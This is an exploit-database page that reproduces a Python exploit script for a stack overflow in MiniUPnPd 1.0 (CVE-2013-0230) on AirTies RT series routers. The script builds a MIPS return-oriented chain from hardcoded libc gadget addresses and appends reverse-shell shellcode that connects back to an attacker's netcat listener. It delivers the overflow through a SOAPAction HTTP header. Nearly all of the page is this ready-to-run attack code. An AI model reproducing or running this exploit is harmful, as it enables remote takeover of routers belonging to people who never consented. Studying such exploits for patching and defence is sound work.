Home / os / blackberry

MiniUPnPd 1.0 Stack Overflow

Posted on 28 April 2015

#!/usr/bin/env python # Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series # Date: 26.04.2015 # Exploit Author: Onur ALANBEL (BGA) # Vendor Homepage: http://miniupnp.free.fr/ # Version: 1.0 # Architecture: MIPS # Tested on: AirTies RT-204v3 # CVE : 2013-0230 # Exploit gives a reverse shell to lhost:lport # Details: https://www.exploit-db.com/docs/36806.pdf import urllib2 from string import join from argparse import ArgumentParser from struct import pack from socket import inet_aton BYTES = 4 def hex2str(value, size=BYTES): data = "" for i in range(0, size): data += chr((value >> (8*i)) & 0xFF) data = data[::-1] return data arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd CVE-2013-0230 Reverse Shell exploit for AirTies RT Series, start netcat on lhost:lport") arg_parser.add_argument("--target", required=True, help="Target IP address") arg_parser.add_argument("--lhost", required=True, help="The IP address which nc is listening") arg_parser.add_argument("--lport", required=True, type=int, help="The port which nc is listening") args = arg_parser.parse_args() libc_base = 0x2aabd000 ra_1 = hex2str(libc_base + 0x36860) # ra = 1. gadget s1 = hex2str(libc_base + 0x1636C) # s1 = 2. gadget sleep = hex2str(libc_base + 0x35620) # sleep function ra_2 = hex2str(libc_base + 0x28D3C) # ra = 3. gadget s6 = hex2str(libc_base + 0x1B19C) # ra = 4.gadget s2 = s6 lport = pack('>H', args.lport) lhost = inet_aton(args.lhost) shellcode = join([ "x24x11xffxff" "x24x04x27x0f" "x24x02x10x46" "x01x01x01x0c" "x1ex20xffxfc" "x24x11x10x2d" "x24x02x0fxa2" "x01x01x01x0c" "x1cx40xffxf8" "x24x0fxffxfa" "x01xe0x78x27" "x21xe4xffxfd" "x21xe5xffxfd" "x28x06xffxff" "x24x02x10x57" "x01x01x01x0c" "xafxa2xffxff" "x8fxa4xffxff" "x34x0fxffxfd" "x01xe0x78x27" "xafxafxffxe0" "x3cx0e" + lport + "x35xce" + lport + "xafxaexffxe4" "x3cx0e" + lhost[:2] + "x35xce" + lhost[2:4] + "xafxaexffxe6" "x27xa5xffxe2" "x24x0cxffxef" "x01x80x30x27" "x24x02x10x4a" "x01x01x01x0c" "x24x0fxffxfd" "x01xe0x78x27" "x8fxa4xffxff" "x01xe0x28x21" "x24x02x0fxdf" "x01x01x01x0c" "x24x10xffxff" "x21xefxffxff" "x15xf0xffxfa" "x28x06xffxff" "x3cx0fx2fx2f" "x35xefx62x69" "xafxafxffxec" "x3cx0ex6ex2f" "x35xcex73x68" "xafxaexffxf0" "xafxa0xffxf4" "x27xa4xffxec" "xafxa4xffxf8" "xafxa0xffxfc" "x27xa5xffxf8" "x24x02x0fxab" "x01x01x01x0c" ], '') payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2 + ra_2 + 'C'*32 + shellcode soap_headers = { 'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload, } soap_data = """ <?xml version='1.0' encoding="UTF-8"?> <SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" > <SOAP-ENV:Body> <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1" SOAP-ENC:root="1"> </ns1:action> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """ try: print "Exploiting..." req = urllib2.Request("http://" + args.target + ":5555", soap_data, soap_headers) res = urllib2.urlopen(req).read() except: print "Ok"

 

TOP